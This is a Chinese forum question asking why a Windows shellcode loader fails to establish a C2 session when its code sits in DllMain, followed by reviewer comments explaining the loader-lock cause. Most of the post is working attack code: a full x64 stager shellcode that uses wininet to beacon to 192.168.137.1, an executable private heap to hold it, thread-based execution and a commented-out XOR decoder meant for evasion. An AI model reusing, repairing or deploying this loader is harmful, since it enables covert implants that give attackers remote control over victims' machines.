
shellcodeloader代码写入dllmain中无法成功上线session


1.以下代码如果直接写入main函数下,然后编译成exe,可以实现上线
2.如果写入 DllMain 函数下面,我使用 DLL 注入或者运行某个进程调用该 DLL,均未上线 session;且调试查看每个 API 均返回成功、shellcode 也成功拷贝进了堆中,不知为何没有成功运行上线
3.但是如果编写一个项目包含exe和dll,在dll的导出函数中写入下面代码不在dllmain里面写入,并使用exe调用导出函数,是可以成功运行并上线的

总之就是感觉很奇怪,也不明所以,对堆的知识也不是特别了解

    // Private heap created with HEAP_CREATE_ENABLE_EXECUTE: every block HeapAlloc
    // hands out from it is executable (RWX), which is what lets the copied payload
    // run later. The return value is not checked; a NULL heap would simply make the
    // HeapAlloc further down fail. An executable private heap is a widely used
    // memory-scanner / EDR indicator, so expect this loader to be flagged on that alone.
    LPVOID heap;
    heap = HeapCreate( HEAP_CREATE_ENABLE_EXECUTE, 0, 0);


    char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6d\x4b\x51\x54\x00\xa7\xcc\xac\x17\x18\x11\x9c\x8f\xd9\x2a\x83\x88\xfd\x03\x8b\xd4\xab\x26\x0a\xd8\x7d\x29\x73\x4c\xf0\x57\x21\x23\x86\xcf\x45\x5e\x3e\xad\xaf\xb6\x0c\x43\x4d\x7a\x7b\xd2\x65\x35\x22\xf5\xe3\xad\xac\xce\x8a\x68\xb9\xf0\x31\x28\x5f\xd8\x52\x52\x6c\xc8\x2d\x74\xa3\x38\xe9\x39\xae\xa7\xa7\x1b\x3a\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20
\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x4d\x44\x44\x52\x4a\x53\x29\x0d\x0a\x00\x96\xc1\x86\x46\x9d\x43\x32\xef\x1c\x0b\x57\xf4\xaa\xd7\x89\xcc\xcc\x37\x78\xa7\x3c\xa3\xeb\x68\xcb\x3f\xc4\xa7\x81\xca\xa0\xcd\x44\x8c\x18\xe6\x04\x07\x1a\x1c\x1c\x85\xd2\x06\xd7\xf4\x80\xd5\x1b\xf9\xc1\xf2\x31\x15\x06\x20\x8e\x04\xb1\x8c\x0a\xb5\x80\xca\x4f\xf2\x34\xde\xe9\xe4\xa6\x32\xb2\x06\x88\x34\xed\xd0\x7c\xbb\x3c\x82\x6e\x4d\xc4\x7f\x73\x52\x60\xe3\xb3\x1a\x2a\x54\x80\x39\x8c\x77\x7d\x35\xe4\xe8\xd7\x49\x85\x64\x04\x85\xc2\x79\xd8\xf1\x65\x16\x2a\x8a\x73\xf8\x21\x69\x9d\x99\x7e\xf8\x46\x99\x11\x48\xc9\x37\x15\xd8\x85\x9a\x95\xa5\x29\x73\xb8\xca\x29\xb3\xf6\xa7\xb0\x3c\x60\xa1\xf5\x7a\xbc\x0f\x7a\xce\x00\x5b\xf9\xca\xf3\x2a\x36\x8a\x2c\xd3\x85\x8a\x55\x1a\x6a\xd9\x31\x08\x40\x55\x8c\x0b\xf1\x2a\x5e\x4b\x15\x1f\x41\xf6\x88\xf6\xa9\x33\x68\x4a\x8a\x2c\xba\x89\x2e\x1c\xe8\x2f\x1d\x98\x9e\xa9\x76\xca\x54\xc7\xfa\x86\x9c\x34\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x37\x2e\x31\x00\x5e\x2e\x78\x90";
 

    // (Refers to HeapCreate above.) dwMaximumSize == 0 makes the heap growable
    // instead of capping it at a fixed size.
 
    
 
    // sizeof on the array includes the trailing NUL of the string literal, so one
    // extra byte is allocated and copied; harmless for the payload.
    int size = sizeof(shellcode);//size
    cout << size;
    LPVOID ptr = HeapAlloc(heap, HEAP_ZERO_MEMORY, size);
    // NOTE(review): ptr is never checked for NULL before the memcpy below. Per the
    // Win32 docs HeapAlloc does not call SetLastError, so x is stale state from some
    // earlier call, not the result of this allocation — check ptr instead.
    int x = GetLastError();
    cout << x;
    /*
    // Disabled decoder: reverses a "(byte + 1)" step followed by an XOR with the
    // index, in place on the source array. If re-enabled it must stay before the
    // memcpy, otherwise the heap copy is still encoded.
    for (int i = 0; i < size; i++) {
        shellcode[i] = (shellcode[i] - 1) ^ i;
    }
    */

    memcpy(ptr, shellcode, sizeof shellcode);


    // Hand the payload to a new thread. `run` is not defined in this excerpt;
    // presumably a small wrapper that transfers control to its lpParameter (ptr)
    // — confirm against the full source. The handle A is never closed.
    //
    // NOTE(review): this call is why the DllMain variant never produces a session.
    // DllMain executes with the loader lock held; a thread created from inside it
    // cannot begin running until DllMain returns, and the loop below never
    // returns, so the new thread stays parked forever. The payload also embeds the
    // string "wininet", i.e. it most likely loads a library itself, which would
    // block on the same lock even if the thread did start. From main() or from an
    // exported function called after the DLL is already loaded no loader lock is
    // held, which matches the behaviour described in the question.
    HANDLE A=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&run, ptr, 0, NULL);


    // Keeps the hosting thread alive indefinitely so the payload thread is not
    // torn down. Inside DllMain this same loop is what prevents DllMain from ever
    // returning (see the note above).
    while (1)
    {
        Sleep(8000);
    }
提问于:2022-07-25 16:03